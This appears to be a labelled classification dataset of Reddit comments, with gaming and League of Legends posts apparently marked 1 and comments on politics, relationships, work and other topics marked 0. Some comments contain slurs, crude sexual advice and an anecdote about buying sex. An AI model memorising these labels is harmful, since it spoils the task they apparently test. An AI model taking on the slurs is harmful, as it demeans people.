0	I think this is kind of silly.  I grew up around rampant piracy by the time I was in high school and college, I don't think that the media itself has any intrinsic value.  When I buy something, I always buy a physical copy.  the actual packaging and disc and such are the part that have value to me, not the actual movie, song, tv show etc.
0	I was getting really tired of my job as Art Director dealing with idiotic clients and an incompetent management team. I do have a family and it's not easy to quit or relocate. An alternative I found was to find a way to alter my schedule. I told my boss I wanted to invest time in my mental health and try and take a class outside of work as well. I ended up getting a flex schedule where I only need to be in the office half days and worked the rest at home. It's not a fix for the problems but it has def helped me get through my days and stay sane.
1	Doesn't mean patch notes wouldn't be uploaded, only by blakinola. Also, dude is pretty much talentless.
1	I had a game today where mid said a couple unkind things towards support for bad performance, this was maybe 7 minutes in. From there on, the support refused to play with the team because of this one toxic players comments. Then the ADC at like minutes 25, when we're successfully winning 4v5 decides he's done too. We lost, can't 3v5.   Not normally this bad. But I'd say, silver-gold it's 1/4 or 1/5 is an AFK/harass/feed/toxic.
0	It's political.   1.Law regulates minimum wage   2.if you raise minimum wage the cost of everything will go up. Pay the little guy more means you have to charge the customer more to make the same revenue. Same idea with taxing business.   I'm against raising the minimum wage because I work for a small coffee business that's helping pay school, insurance, and maintaining a  low maintenance long distance relationship.   On a good day we do $200 dollars in sales (like I said small) take out the 80 you have to pay the employees 30% of which doesn't even make it to them because of the government. now take out the cost of the lease space, the product we had to buy, and a ton of other stuff I wouldn't realize because I'm not the boss. If minimum wage was raised to even 8.50 we would have to be replaced by vending machines.   All raising minimum wage does is make it harder for small business to get started and it allows big business to get bigger with no local markets to compete with.   If you really want our economy to get better then look into the fair tax. The idea is we get rid of income tax and just do consumer tax. You want the rich to pay higher taxes? They will with fair tax.
0	This topic got brought up at a family reunion with my catholic uncle and aunt. I said "if a patient is suffering, they are coherent, and their family is okay with it,  it should be theirs and the family's choice." My aunt and uncle immediately went to the religious side and said Jesus suffered for us and so we should suffer as well. There was no discussing it with then past that, they wouldn't budge. I don't think medicine and science can progress in the future with that kind of thinking still prevalent.
0	This is why the best way to zip through college and many of those biased GE courses is to tailor papers to the professor's opinion. I once had a polysci professor who told us white males get everything handed to them on a silver plate, so naturally I wrote my paper on how I don't have to work hard because I get everything handed to me.
0	Just because society believes that there is a great white spaghetti monster in space that loves them it doesn't mean that there is a great white spaghetti monster in space that loves them.   Just because someone believes that guns should be made illegal because it would make the world safer does not actually mean that gun control makes people safer.   Just because a majority of people believe that being fat is terrible doesn't mean I should hate myself.
0	Minimize the task bar, get rid of all those tray icons and a little customization can't hurt.
1	Gold 5. And no. No mater what ive been doing pickup wins in silver is hard. Either my team feeda and i do okay or i feed and my team cant carry or no one puts on the effort to push.. silver is a hard life and half the games i could have done better but the othet half still would have been losses if i was playing my best.
1	Could you please allow 4v4 on the map? At least in Custom Games?   Sure it's not made for 4v4, but atm there is a giant hole in MOBAs regarding 4v4.   Basically if me and my friends end up being 8 people, we have no choice but to go ARAM or a Summoners Rift 4v4 (which is horrible).   I don't see the harm in allowing us to play TT 4v4 in custom games.   At least give us the option till you guys give us a real 4v4 map?
0	Funny story.   My friend flew into the Phillippines from Hong Kong last summer. He was on his way to see a girl he'd met on a previous trip to Boracay with some douchecanoe who was trying to score a mail order bride. Didn't work out for the douchecanoe, but that's another story.   My friend and the girl he met, they weren't serious. But he liked her, and he sensed it could go that way eventually. While planning this return trip, he decided to cross one off the bucket list.   So my friend flew into Manila from Hong Kong. Having a full day to fuck off in Manila before catching the ferry to Odiogan, he booked a room at a nice "hotel," one with toilet paper and plumbing.  He chose this hotel for its "amenities." Well, four girls and 24 hours later, he received an "invoice" for "room service." The "invoice" didn't reflect the prices on the "menu," and he said so.   Enter six pygmy Filipino men armed with tiny baseball bats. After debating the odds, he decided to just pay the $1000 bill.
0	I remember back in 2004 I started a Software Engineering Degree. Took a Java Introductory Class. It all made sense to me, and wrote some really basic programs. Sort of. I followed the textbook pretty much letter for letter, but nothing ever ended up compiling. I had no idea why, and didn't particularly care. I guess it was a sign that it wasn't really meant to be what I was doing, especially since my class mates would write almost the exact same thing and theirs worked fine. I ended up getting a 12 for the class - the lowest I've ever scored in anything! Saw a careers counselor who suggested giving the humanities a go. Changed degree the next year and had 3 of the best years of my life, drinking in the tav, going to class half drunk, winging assignments. Yes I probably could have made more money had I studied harder in software engineering, but you'd be surprised how well community services pay as well.
1	I like how you put the douchiest part of this in quotes to make it seem like its something Variar said.   And since he didn't answer, let me: Entitled ass hats like you make this community the cesspool it is. Telling people that they shouldn't ask for more than they're getting is an attempt to cull you shit sippers out, or at the very least that you're not remotely liked. This "me first" mentality is the same as the people that rage in chat and take no blame for losses.   Now, to expand on Variar's point: Riot should not be expected to give away anything. They will give away IP boosts, sure, but to think we should get more is insane. They gave us a rune page already, they give us IP boosts, and you can get alistar and annie for free with about 30 seconds of work (not to mention the skin codes they circulate). But on top of that, they gave every one of us a free game. Not a demo, Not a timed trial, a free game. Also, other than skins (which only offer a cosmetic difference), they gave us a way to unlock everything in the game for free.
1	Your LP gains and losses in ranked are determined by your MMR compared to what MMR is expected for someone in your tier/division.   EFT = Expected MMR for your tier/division   MMR < EFT --> LP gains < LP losses. The system thinks you should be in a lower division/tier.   MMR = EFT --> LP gains ~= LP losses. The system thinks you are roughly where you belong.   MMR > EFT --> LP gains > LP losses. The system thinks you should be in a higher division/tier.   Furthermore, in division 1 of any tier LP gains/losses are also affected by clamping. Clamping stunts your LP gains/losses. Clamping gets more severe the closer you get to your promotion. It is possible to gain +0 LP for a win if you are at ~99 LP and your MMR is insufficient for the next tier. For more information on clamping please read [this]( post.   Additionally, your LP gains and losses are also affected by the average MMR of your team compared to the average MMR of the enemy team.   For more information about the league system read the [Season 3 FAQ](   For more information about MMR read [this](
0	This didn't happen. Editors work in editing bays with multiple people in them and they constantly have producers walking in and out of their bays to review the edited footage. A show as big as this one would have a full editing staff working 12 hour shifts as they pump out the footage into coherent episodes for a full season.   OP is also unable to steal the footage because once the film has been shot, it is collected, tagged and organized by a media manager. The media manager then drops off the footage to the editing bays for editing.   Also, any footage pixelation would be completed once the episodes had been laid out in the editing bays. So he would have days, if not weeks, to review footage before it is pixelated. Production companies aren't going to waste valuable time pixelating every single second of video when they need to be building the footage into episodes.
0	Personally, I don't think "Anti-Military vibe" = "anti-troops vibe"; i.e. I can't stand some of the decisions made by my government (Iraq anyone?) but that doesn't mean I don't support those men and women who put it on the line for our "freedom".  I may hate the IRS, but the people working there are doing a job, just like members of the military.  On the other hand, without citizens willing to blindly fight and kill anyone they are told, government leaders (bush anyone?) wouldn't be able to carry out such horrific acts...
1	In my case, I quitted Lol mid season2 at around ~1400 elo i think (silver 2 icon and silver portrait). From times to times I would play some occassional aram custom games, and when by the time they introduced the soloq aram, I started playing Lol again full time, but avoiding ranked (and summoners rift in general).   So a very good friend of mine, who was gold2 in early s3 but quitted the game started playing again. He was dropped to Silver2 or 3 by then,so he wanted to get Gold again for the rewards, but after failing Gold5 promos 4 or 5 times he asked me to help him.   The strategy we had was to get duo bot with Leona as support. The reason was to play aggresive, destroy enemy support and if not kill, at least prevent enemy ADC from farming. This would bring frustration to enemy team, with a weak ADC, flamming his support and/or jungler for not ganking (hehe). So after my placement matches I got placed in Gold4, and he got to his promo matches.
0	Yeah, fuck all these haters, dude. If your feelings are hurt by it, talk to her about it. If she's not sympathetic, then  that's  a reason to break up. If your feelings aren't really hurt, then whatever. Look, she's with you, not with him. He's the ex for a reason. If the facts of the matter are that your big dick isn't doing it as well for her, you guys need to start trying some different shit.   I know some stuff about big dick issues. Try some different positions. If it's a girth thing that's hurting her, you may just need a lot more time to warm her up. Do summore foreplay. Remember that vaginas are capable of stretching a  lot . Also remember that "loose women" are ones that have "loose morals" because of antiquated ethical systems; vaginas don't get all loose from having sex with big dicks. That's a phallusy. (Sorry, couldn't help myself).   If it's a length issue that's causing the pain, you'll wanna try a different angle. The most common problem with length-related pain stuff is mentioned a couple other times ITT; hitting the cervix. You wanna be hitting either the anterior or posterior fornices. (That's "fornix," in the singular.) Look that shit up on wikipedia. Show her. Talk about it. Find a good angle. If you got a straight or up-curving dick, she likes g-spot stimulation, and she likes missionary, you might wanna try pushing her knees up toward her shoulders and maybe putting a pillow under her butt. If she prefers clit stimulation, it might work better with her on top doing more of a grinding motion. The bottom line is that different bodies fit together differently, so, if you're both trying to do the same shit you did with other, different-shaped people, you're gonna have a bad time.
0	Ok. First, this does go in a bit of the other direction I've flown in this thread. I've been on both sides of this equation, and I totally feel the plight of the people who don't want to be tagged as bad people for "friend zoning". I'm going to have to interject for a minute, and this may or may not be fitting the bill of what you speak, but I would like to throw this out there as this firmly fits into your judgement. I am a married guy now. For a long time, I was not. The majority of my 'relation' decisions prior to getting married was really just about who I'd like to fuck. Needless to say... that never really resulted in a real relationship. Not to say it can't, but for me it didn't. Flash forward to around 26. I met my now current wife. We were friends before we ever dated. We hung out. I never looked at her like somebody I would like to fuck, but the more time we spent together the more I liked her 'in that way'. I banged a slew of her friends (who I guess you could say were more attractive). So.. in essence I had friend zoned her. That did all change one Halloween when I got shit faced with her friends and came home to her (we were room-mates). I found I'd rather spend my time with her than with her friends. This eventually blossomed into the relationship I have today. On the surface we are pretty mismatched. I'm a fairly fit guy with a good job and a degree. She has little to no education, her job sucks, and she's 'chubby'. People often wonder what I'm doing with her. The bottom line is... I love her. She has a great personality. We mesh well together. We have common interests. Our financial goals are (usually) the same. So while I do wish she would go to the gym with me and such (she's not ugly for the record, but she could be in better shape) it's not the crux of our relationship. I do not cheat on her, though I could, with other more attractive women. I wouldn't want to hurt her like that. I can feel people judging when we go out. She is fairly self conscious about it but really, I don't care what other people think about my relationship. Before this relationship, I probably felt about the same, that the major piece of any relationship was pure physical attraction. It turns out I've found that I value other things just as much. Of course I still try to push her towards the gym with me from time to time, but there's no harm in seeking improvement right? Anyway, point is, could I be with a more attractive person? Yea. Absolutely. The problem is, the only more attractive person I could see myself being with is my wife after she's become more attractive. It's that bad.   Edit and
0	As a dishwasher  at a busy casual bar here in Canada I kinda can confirm about this. I'm glad finally someone posts this! I'm trying to move my way up to be a chef! I guess it's where it all starts is the dish-pit!   I remember one time I was so behind and it was like 1 am and there was a guy drinking all alone and when I went to sign out, he gave me $50. It made my entire week cause I was still in high school (last year)   Another story is that some guy got so flippin' drunk an he puked all over the restaurant bathroom floor right by the toilet and I was sent out to clean it. I was so disgusted and pissed off, so a regular customer came up to me and said "You work way too hard being a dishwasher, here's $20" it made me really happy and much better.
1	While true, this doesn't mean you're suddenly not copying Protato anymore, it's still nearly identical and you'll most likely remain in his shadow. The constant champion taunts and joke spams were unnecessary and frankly just a tad annoying.   I'd suggest listening to Nristu, find your own niche or speciality, something that sets you apart. The lack of commentary during the games doesn't differentiate all that much, if all it makes your variation seem even cheaper.
1	what's the
0	My dad got me a world map and globe when I was 6. We would play a game where he would spin the globe and stop it on a country, then I would have to name the capital, or the other way around where he'd name the capital and I'd name the country the city belonged to. I sat near the map so I could look if I couldn't get it but after a while I pretty much had all of them memorized. Overall it really sparked an interest and willingness to learn growing up, and I have my parents to thank for constantly giving me these intellectual challenges that to me just felt like games.
0	Jesus tap-dancing Christ. I  knew  it wouldn't be long before I found a comment like this. I know you mean well, but some things need not be said.  No one of that weight needs to be told it's unhealthy. No one of that weight is proud of it - even if they claim to be - unless of course they used to be much heavier.  And if that's the case you can be sure they're still on the way down.   I am in that range and I'm so fucking sick of hearing about it.  I know. All overweight people know these things.  Please stop trying to be helpful. If you want to be supportive, and I can tell that you do, be complimentary and leave it at that. This is why I  never  discuss my diet with other people. If I hear one more "oh, you should blah blah blah because heart disease and diabeetus" I will lose my shit. This is the god damn age of the Internet. There is not one single person over the age of ten who doesn't know what obesity is, whether they are, and how to fix it - or failing that, how to find out in ten seconds on Google.
0	Exactly this. A lot of people don't understand, however, that this does NOT apply to hamburger meat. The meat is likely composed of many different cows (if store bought). Even if it isn't, the increased surface area of everything in the middle of the burger - paired with the separation and grinding processes of the meat - allows for bacteria growth that anything cooked below Medium will simply not kill.
1	While I don't condone the bad manners of any of the players, professional or non-professional, I will say that you are going to have some bad apples all the time and sometimes it's entertaining (e.g. Idra- Yeah I did it :P). I do I agree the LoL community needs to improve itself, though, as it seems many pros still rage and troll in their own matches (and I won't even begin to start on regular players)   But I do think that Dyrus is one of the more well-mannered and humble people out there. Have you watched his stream? Sure, sometimes he gets frustrated, but for the most part he is polite and seems to genuinely love videogames. I've heard him talk about how people should rage in game and how it doesn't help anyone multiple times and he also talks about trying to stop his own raging. If you even look at how he acts w/in his team, he always owns up to his mistakes and talks about how he will do better. So don't single out Dyrus... he brings more entertainment and humility than more than half of the other professionals out there
1	well if you want to go up in ranks you should work with your team if your team wants to push mid but u think top is the better call you can tell them if they do not listen your better off grouping with them in mid. if you are just going top by yourself and they fight a 4v5 they will lose because of you not being there. once you get higher in ranks people will have a better understanding on where to go. so my advice to you is help your team even if it is the wrong call. because you will have a better chance wining when your with 5 in the wrong place than with 1 in the right place and 4 in the wrong place.   GL in yoloQ
1	I think they don't want to be affiliated with the Olympics or suggest it, because the Olympics has multiple teams just looking for companies or people who are using or even implying word's such as "gold", "olympics", "bronze", "2012" and so on. There has been a lot of incidents in the past few weeks in London, where they are suing grandma's to companies.
1	The glitch is a result of a disconnect between movement prediction, her cougar pounce, and packet loss. This actually happens with a few other champions with non-targeted dashes (Lucian has this issue as well the last I checked), but the reason they don't pop up on the front page of reddit is because they don't spam their dashes when in the fog of war. A very important thing to note is that "packet loss" does not mean lag or ping spikes, so while you may think that you don't have packet loss, you might.   There is a way that seems to fix it for most people, which would be to disable movement prediction (in your menu) for now.   I believe the reason they aren't disabling Nidalee is because this isn't a bug with her kit, but issues with the network. Other champions have this happen occasionally with their dashes as well (Disappearing, gliding over walls, or showing up in weird spots).   They could theoretically modify the code to interact in a different way, but that would require a LOT more than a "bugfix" and would end up leaving her and a few other champions disabled for months. They are most likely just trying to fix the network right now and that should fix it.
1	Agreed with most points. I actually feel that her shield gives her a huge edge over most ranged laners who doesn't have reliable harass (Ori has this in spades) and her ability to push early on negates their lane dominance. Conceptually she's supposed to have an edge over them at 6 but with the nerfs she received, her all-in just isn't that good anymore.   Top lane I feel is a bit more dubious since while she does lose with direct trading, her ability to control the lane through either pushing hard or last hitting is a great advantage that can help turn a lot of matchups around. The reason why I mentioned Triforce is that I feel it gives her the greatest amount of power as early as possible which also scales well into late game because of how her kit scales. While she won't be outdueling most bruisers (unless she snowballs, which Triforce allows her to take full advantage of), she will, in a sense, hyperscale into a Assassin-Fighter with just one item and do really well in teamfights.   I'll agree with your conclusion that she's weak. I'll then add that she still has unexplored strengths that should be evaluated in order to see what exactly needs to be buffed. Her nerfs happened precisely because Riot didn't want an Assassin who entered the fight with huge burst damage and burst tankiness. This is why I feel that instead of making either stronger, she should be able to do it more often now that her power's reduced.   EDIT: Ended up with a wall of text.
1	Zeus >Static Field: Radius 1000 >Zeus shocks all nearby enemy units whenever he casts a spell, causing damage proportional to their current health.  > Percentage Of Current HP Dealt As Damage: 5%/7%/9%/11%   The cooldown on his abilities are 2, 6 and 120 seconds. Using the 2s CD ability for ease of maths, means he deals roughly 21% of current hp in damage every 4s, in a large radius.  Mundo > Infected Cleaver  > Magic Damage: 15 / 18 / 21 / 23 / 25 % of target's current health  > Range: 1000  > Cooldown: 4 seconds   25% of target current health each 4 seconds, considering he doesn't miss.  That's a 4% difference. Zeus seems stronger to me, as it hits in a radius the size of the cleaver's reach. Also, it is a 21% current hp damage on top of the spell damage of the spell cast by Zeus.
0	I had to do that for my Dad at a meeting of a cottagers assciation(sort of a landowners meeting, done yearly). Everyone knew he had trouble hearing. One particular lady who had only owned her place for a year, spouted off about part timers(people who only cottage in the summer) not chipping in for snow plowing of a joint road. I told my Dad what she had said, his reply to me was "ask her who cut the trees to make the fucking road". My Dad has been going there since the 60's. So I gave his reply for him, and the rest of the meeting went exceptionally well.
1	That is honestly one of the main reasons I don't like to play much anymore. normals are boring and ranked is full of retards like that. Fortunatly for me I've been able to come to terms with the fact that 90% of the people I play with will bitch just to bitch, and are in the wrong most of the time, so i just ignore them. Not ignore in-game, cuz i like to see how retarded the people i'm playing with are, i just don't reply.   Which actually brings up a point i didn't think of. I've had quite a few games myself where I do poorly and feed and just ignore people when they say noob gg feeder fgt lawl. Most of the time they dont say anything after that, sometimes they will remind me that I'm bad when i die again, but a lot of times they don't. A couple times I decided to say something back and it was like throwing rocket fuel onto an H-bomb. I'ts like when you learned in school to just ignore bullies cuz they are just trying to get a rise out of you, if you dont give them what they want they will move on and start raging at someone else.
1	I totally agree with you. I was on my series matches for gold in the pre-season and after a 4/6 spread, I was put into bronze 1. I managed to climb out of that in a day but the real problem I'm beginning to find is silver 5. As mentioned in the comments, those players that truly are bad will fall and rot at the borders and that is EXACTLY the problem. I've been playing religiously for a week in silver 5 now and not once have I exceeded 80LP. I've had a win, lose, win, lose etc. pattern continuously. If I manage to break out of it, I only fall back down again and it's due to the totally incompatible players that I'm put with. I lose almost 100% of my games positive, after winning my lane hard. The frequency of arrogant players who treat the game like some alternative to Call of Duty is generally keeping me in silver 5, in the shit, and no matter what lane I play or how well I do; winning is not on the agenda. It's gotten to the point that I predict faults in my team's play, like being caught out or throws before they happen, and they happen despite how much i ping and warn the rest of my team. So this whole attitude of "if you are worthy off higher elo, you can climb" is rendered void seeing as League is a team game. The players in low silver and bronze are simply playing for themselves (I want to avoid saying playing the game wrong, but the team attitude is totally wrong) and that can seriously bind better players in the depths of under-average play.
1	Most profesional teams have a map (a picture or a table usually) to plan strategies and lvl1s. I don't think neither you or him were the first ones to think of implementing it online. I would only consider it as stolen if he somehow used your design and changed trivial things.   Even if his inspiration to do it was your post, if he still created his web by himself I think it is completely fine. May the best (this includes making it public) one win.   In general, when millions or people are doing similar things, a decent number of them are going to be thinking the same ideas. That means that the value is in implementing the idea, nor the idea itself. Ideas are only valuable when the number of people is inferior (like in a top-level field of science, where only a few people in the world are working on).   Plus, if you share an idea, you have to be aware that other people may do it faster and better. They may even think that you have abandoned the project.
0	Personally, I would love to see a plan to fundamentally raze Detroit, reallocate the residents, wipe out the political system, and rebuild from the ground up.   It is my understanding that the potential tax base of Detroit is too small to support the budget required to provide basic City Services to the residents.  Too much area, not enough population density, not enough tax payers above the median income level.   In its current state of decline, Detroit is trying to operate as a city without the upper two-thirds of the socioeconomic scale.
0	i joined AmeriCorps after hurricane Katrina because I wanted to help, but during and after my service I recognized that I and others were there for another reason: disaster is fascinating.  There's the proverbial "train wreck" from which one cannot look away.  There's something alluring about suffering and extreme dislocation of civilization, for those who live comfortably from day to day.   Why?  I connect it to the amount of hemming and hawing over the "apocalypse" in general. Stories like The Roard, Blindness, numerous apocalyptic sci-fi films, the cynicism of futurists about the chances for human survival, and, yes, zombie fiction of all stripes, all point to some kind of yearning to think about this stuff, to imagine ourselves after the fall of humanity.   Why would that be so exciting?  I have a theory, that we are into that kind of thinking, those kinds of fantasies or predictions about real nuclear threats, because all of that represents an eventual freedom from responsibility.  In a secular sense, your moral responsibility comes from living with other people in a society, in the context of civilization.  The apocalypse means it's all done.  Freedom.  You don't have to worry about what's good for the world, or how you should act to fit into it, because it's over.  There is no world.  There's just you, and survival, the simplest impulse.   That freedom opens up numerous possibilities.  One of those is 100% amoral recreational killing, and the zombie apocalypse is the best example of our desire for that.  Zombies and Nazi's; mow 'em down, and meet a desire that you have on some level to kill human beings.   But that's not the only possibility: another is to set up a new society on your own moral terms.  Think of how much we love Battlestar Galactica.  The post-apocalyptic context of that story is a big part of why it's great.  Those people are responsible for creating whatever moral order is to exist in the universe. People in such situations are the ultimate change agents, because the powers that be are gone, the status quo has evaporated in atomic flame.  Obviously there are new obstacles, but those (evil robots, unpassable scablands, cannibal hords) often fit better into our narrative thinking as parts of an epic Heros Quest than the obstacles present in our mundane, living civilization.
1	I'm not sure why anybody is surprised at the amount of flaming that goes on at sub-30 levels. It's not like anyone down there (I'd suspect, anyway) has been completely insulated from the general toxicity of online gaming. The flaming that goes on in LoL and the LoL community is not limited to LoL -- just spend a few hours playing CoD, Counter-Strike, Starcraft, or any other competitive online game -- it's just as bad, if not worse. The amount of racist, sexist, bigoted hate is absurd.
1	Sure you can make plays....but if you're clearly better than your opponent in terms of game knowledge, why not play a solo lane carry? Many have gotten elo through support, but that route is tedious in an elo where you are easily able to outplay/snowball in a carry role from your opponent's many mistakes.
0	I've been on the receiving side of an accident because of this actually. I was in the back seat of my friends car while we were stopped at a stop light. Suddenly a giant white van rear ends us at 30mph! Forces us to hit the two cars in front of us, and totals my friend's car. I luckily only come out of it with a bit of whiplash and an extremely minor and fixable neck issue. The guy's reason for not paying attention was that his fucking chihuahua was trying to get off his lap.....
1	It's fun till you find smurfs like Reep's here:  and tinker's here:
0	Consider the following mutually exclusive methods of education:   A) Committing a crime can result in you being arrested and going to jail. If you are imprisoned, you won't have very many options as to what you can do in life. If you don't have many options, you won't be able to do what you consider is fun. etc.   B) Everything which is illegal is bad. Everyone who does illegal things is a bad person. Bad people go to jail. Why? Because they're tautologically bad according to the definitions I've supplied you.   In method A, you are supplying them with judgement-free information, which they can use to make their own decision, and come to the rational conclusion that it is beneficial for them not to break the law in nearly all cases.   In method B, you are indoctrinating them with an absolutist moral philosophy. They will eventually be able to find a hole in it once they are old enough and determine that it is "bullshit". Once they do, expect them to contrarianly rebel and go against the prescribed action of your intended lesson, even in situations where it would be more rationally beneficial to follow it.
0	This is true... but misleading.  If there is a will that "leaves it all to someone", it's true that the inheritor of the estate does "get the loans" too. So they must use the estate's assets to pay off the debt before the rest of the estate can be distributed to his heirs/legatees/inheritor. But if the estate isn't enough to pay the debts, the remaining debts are extinguished, similar to what happens in bankruptcy.
1	Fiendish Codex man, it is super efficient and builds into further efficient items (If you accouunt for spots in your inventory as a cost-worthy resource).   Tanky AP sounds like you are going to overfarm and not get the kills an AP champ should. Kind of like a contrast between Ryze and Annie. Build-wise they can be almost opposite, but Ryze's ult is what makes him a good burst/teamfighter. Xerath seems like he's going to rely heavily on positioning and scaring the opponents off with combos. I mean, he's literally a cannon, why can't he be a glass one? Caitlin doesn't build tanky, neither does kogmaw. Range allows you to get away from that sort of thinking. I'm going to insta-buy him regardless, but I am banking on him being able to flash while sieged.   If you're going to hook up flat AP quints, I suggest taking impoved ignite over the cdr on your summoner skills. That way with starting dorans and popping ignite at lvl 1 you sit around 40 AP. I do it with Swain, and it shocks the fuck out of people thinking they can take me down. With his range, you're taking the gamble out of the equation. If you can hit his abilities, its going to be like that bullshit range that orianna had, and could just push anyone out of mid at lvl 1.
0	Euro-Socialism works because everybody takes part in it. Being against public healthcare because the majority of people can afford it anyway is dangerously ignorant egoism.
1	Apparently some people don't get it so I'll elaborate.   Ranked solo queue is bad for a number of reasons.  Here are just a few:     You get a meaningless rating.  And no, no,  no , it's meaningless because League of Legends is a team game.  You might be able to carry teams of random people but you will always lose to a coordinated team with planned strategies, even if they are less skilled.  Your solo queue rating is nothing more than an e-peen measurement.  Get over yourselves.  Even if you make it to 2700+ you are still probably not professional team level.  People may not watch your stream unless you can create good content for them.  And that doesn't just mean being good at the game.   There's no prize for 1st place.  People might see your name but the price you pay in getting it far outweighs the actual value from what I've heard.  Maybe the average person will look at the rankings and say hey you must be pretty good.  They'll likely move on pretty quickly.  It's not that big of a deal unless you're interesting enough to hold their attention.   It's very accessible to all level 30 players.  You're going to get just as many trolls (if not more), just as many leavers (if not more), and a fair amount of casuals when you queue for ranked.  Many of you will tell yourself and claim to others that you're playing ranked because you're serious about winning.  Again, get over yourselves.  If you want to truly play this game seriously and competitively, forming a 5v5 team is the only real option.   You are taking League of Legends way too seriously.   I mean it.  It's a game.  You are likely not playing with $2,000,000 in prizes on the line.  You are likely not backed by sponsors who want to see results from your practice.  You are probably some random guy sitting at his computer who wants to show off 1800+ ELO.  You might want to get there one day.  And that's fine.  That's absolutely great if you do.  But you're going to lose along the way.  Your expectations probably won't bet met.  If you want it so badly that you're going to get frustrated and flame your teammates for not being as skilled as you are, then I have a simple suggestion for you:  Pretend to be a really cute girl and get a pro to duo queue with you (Sorry girls, I don't like it either but it's a proven method).  It's easier, less frustrating, and (is now) semi-permanent.  Winning isn't everything.  You usually gain more from a loss than from a win.  Deal with it.  Have fun when you play.  That's not a "casual gamer's" mentality.  It's that of a sane person.   Solo Queue is not a competitive game mode.  I've been saying it and now I'll say it again.  You are going to get trolled.  You are going to get people you can't carry.  If you join a 5v5 team however, you will likely not get trolled.  If you do, you just kick him from the team or join another one!  Your teammates will probably be on your level or close.  Easy!   Solo queue is a learning experience first.  You might want to win, most people do, but [Doublelift himself says]( that it's mainly about making yourself better.  The best way to play solo queue is to learn from your mistakes and make observations, regardless of the game's outcome.   There are only a few major differences between Ranked Solo Queue and Normal Draft Queue:  You don't have a visible rating in Normal.  You only have Solo and Duo queues in Ranked but you can run into Triple/Quadra queues in Normal.  5 man queues are usually matched with other 5 man queues.  "There are more casuals in Normal queue" - it's sort of a valid point, but again in Solo Queue the only way to consistently win is to carry.  There are always ways to improve.  There is nothing you can't do in Normals that's exclusively available in Ranked Solo/Duo.
0	So I'm at my first work event. My company partners with another company in another town near us. We get together every month for company training and a potluck lunch.   I still didn't know anyone, so I sat with my boss and a couple other people I know from my office. My boss, of course, knows everyone and was introducing me to each person that came by our table.   Right before we were getting ready to eat, this couple comes by and I am introduced to them. This guy is a Co-worker of my boss at his other office and they're also pretty good friends. He introduces his wife to me and we exchange hullo's. My boss then takes a second to express how sad he was to hear that her father had recently passed, as he had recently lost his. She squints at him, confused, and says, "My Dad isn't dead..."   Now my boss is confused. "But, Dave (name changed) missed last Thursday and Friday to be with you for the funeral and..." Then he realized what was happening.   She shot Dave the most horrifying death stare and says that she needs to talk to him outside. They leave the room and we can hear them arguing outside. Eventually it turns into screaming and crying. It's tough to distinguish what was being said but at one point everyone had to hear her scream, "You were with HER again, weren't you."   Turns out he had been lying to everyone in order to meet with his girl on the side. He came back in without her and I overheard him talking with my boss.
1	You wont get banned for this. If you do, you will get unbanned after you send a ticket. Well, thats assuming you didnt break summoners code in any other way.   As for me, i warn people when i want to try something unusual, then pick it and mute those who start bitching about it. Although i make sure i dont pick adc top when team already has 4 squishies and stuff like that.   I cant stress enough how good is mute function for those who start bithcing about someone elses pick.   edit1:
0	Some alarm on my iPod went off in the middle of class recently. I must have set it with my face while I was asleep or something, because it was set for 11:42am and had never gone off before. I let it go off for 30+ seconds before I realized it was mine. I hope everyone in class forgave me... If you're exaggerating with the 3 minutes part, maybe that's what happened to this guy.
0	I have a story as well:   In Toronto, this company was having a video game tournament and I arrived late, not knowing it was going on.   One of the games there in the tournament was Mario Kart Wii. I was forced to enter as a wild card, and I had to win every single race I was in to get to the finals.   I forget how many races there were before the finals but I pulled that shit off, getting first in every one. I'd drawn a crowd at this time.   Finally, the finals vs this other guy who managed to get 1st in every race but one. He was really good, and got 3 firsts in a row. (Best of 7) - But he started getting cocky at this point.   Fast forward. I get 3 firsts and it's game 7. Final lap, Koopa Cape, coming up to that final jump. He's in 1st and I'm in 2nd. I have nothing, he's going to win. He stupidly drops behind me at the question box to get something and ends up in 5th (or something) and gets a blue shell. I ended up with a mushroom.   So he shoots the blue shell at me and smirks, easily passing up to second and waiting till it hits me. I hit my mushroom as the blue shell is overhead and I blast through the blue shell and over the line. I win, by one point.
0	As somebody who actually was suicidal, and am on antidepressants, it's not what it sounds like. It doesn't make you want to commit suicide, it gives you the initiative. I don't really know how to explain it, but when I was off antidepressants I wanted to commit suicide, but I had no drive for it. For example: You're brain is that one friend who is betting you to do something really stupid. Normally, you would be like "Fuck that, bro." But the antidepressants come in, and are like that one friend that is always saying "Come on bro, no balls! Pussy! Do it faggot!"
0	Not necessarily. Not arguing the part about pulling out, but as far as the socks go, it can work to an extent. If you have something with you that you believe to be lucky then you can reduce the level of stress so it's easier to concentrate. Of course studying and actually knowing your shit means much, much more, but I think the comfort of the "lucky" item may be useful to some people.
1	This is not the way to go about doing this to be honest.  Like hotshot said hundreds of times yesterday, he is VERY VERY FORTUNATE.   Being a pro gamer isn't a decision you can make in a day.  Most people who try to be a pro-gamer FAIL.  I'm not trying to say you will, I'm trying to tell you that you shouldn't quit everything while pursuing this.   Find a team first.  Stream in ALL of your free time.  You should still continue your job, quitting school I'm hoping you didn't do on a whim.   I really hope you didn't do all of this because of hotshot.  Honestly man I hope you make it, but you can't just copy someone elses story and make it your own.
0	Exactly, the thing is insulting/shaming someone because of a problem just isn't what you do(at least not what I think to be right). Of course you shouldn't aspire to be fat and it should be highlighted as a negative, but rather than making someone like crap you should try encouraging them to lose weight, the same way you would encourage an alcoholic to go to AA or a drug addict to go to rehab or something? Everyone has problems and giving them shit for it will just make it worse. But some discouraging/limits are necessary smoking is taxed incredibly highly compared to shitty food and and everyone's image of a drug addict is the same so why not overweight people too?
1	Because spells are limited by mana and cooldowns early whereas autos are not.   If you rush pen boots as a mage you will be heavily mana gated, someone like Panth who relies on spells is also going to be mana gated but can also cast autos which would benefit pen boots.   If that kinda makes sense.
0	My GF had that habit is well. I talked it out with her at one point and it came down to this:   When you are fighting the mooks you look busier. So while it may be something you don't need to pay as much attention to or would happily pause, your controller or keyboard is being clicked and you are staring at the screen. You just look busier.   Then as the game transitions to the cut scene there is that lull where you are not doing anything (and personally this is when I would go to scratch an itch or light a smoke or just not look at the screen). So my GF would start talking, of course as soon as her first sentence is over the game has loaded and now there is Something Important ^^TM  going on.   So we talked, I told her about the calm before the storm and that the less interaction I am putting into the game the more exposition it is probably throwing at me. So now she talks during mook fights and looks for subtitles so she knows she isn't going to be fighting for my attention.   Problem solved, I don't miss cut scenes and she feels better about starting conversations during the times she used to be worried about.
